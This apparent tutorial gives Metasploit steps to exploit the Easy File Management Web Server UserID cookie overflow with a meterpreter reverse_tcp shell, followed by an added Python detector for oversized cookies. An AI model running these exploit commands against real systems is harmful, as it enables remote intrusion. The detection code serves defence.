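Hacking a Remote Windows PC Using the Easy File Management Web Server Stack Buffer Overflow
Easy File Management Web Server v4.0 and v5.3 contain a stack buffer overflow that is triggered because user-supplied input is not properly validated when the UserID cookie is processed. This may allow a remote attacker to execute arbitrary code.
Requirements
Attacker: BackBox Linux
Victim PC: Windows 7
Open a terminal and start msfconsole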
use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit
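On the defensive side, the flaw described above depends on an oversized UserID cookie reaching the server, so a proxy or log pipeline can flag such requests before or after the fact. The following is an added example, not part of the original article or of Metasploit: the 64-byte limit, the function names and both sample requests are assumptions constructed for illustration.

```python
# Added example: flag HTTP requests whose UserID cookie looks like an overflow attempt.
# MAX_USERID_LEN is an assumed policy limit, not a value taken from the product.
MAX_USERID_LEN = 64


def parse_cookies(raw_request: bytes) -> dict:
    """Return {name: value-bytes} for every Cookie header in a raw HTTP request."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    cookies = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"cookie":
            continue
        for pair in value.split(b";"):
            key, _, val = pair.strip().partition(b"=")
            if key:
                cookies[key.decode("latin-1")] = val
    return cookies


def inspect_request(raw_request: bytes) -> list:
    """Return a list of findings about the UserID cookie (empty list = nothing suspicious)."""
    findings = []
    for name, value in parse_cookies(raw_request).items():
        if name.lower() != "userid":
            continue
        if len(value) > MAX_USERID_LEN:
            findings.append(
                f"UserID cookie is {len(value)} bytes (limit {MAX_USERID_LEN})"
            )
        # A legitimate identifier is printable ASCII; raw binary is a strong signal.
        if any(b < 0x21 or b > 0x7E for b in value):
            findings.append("UserID cookie contains non-printable bytes")
    return findings


# Constructed sample requests (not captured traffic).
BENIGN = (b"GET / HTTP/1.1\r\nHost: 192.168.1.2\r\n"
          b"Cookie: UserID=alice; lang=en\r\n\r\n")
SUSPICIOUS = (b"GET / HTTP/1.1\r\nHost: 192.168.1.2\r\n"
              b"Cookie: UserID=" + b"A" * 300 + b"\xff\xfe" + b"\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_request(req))
```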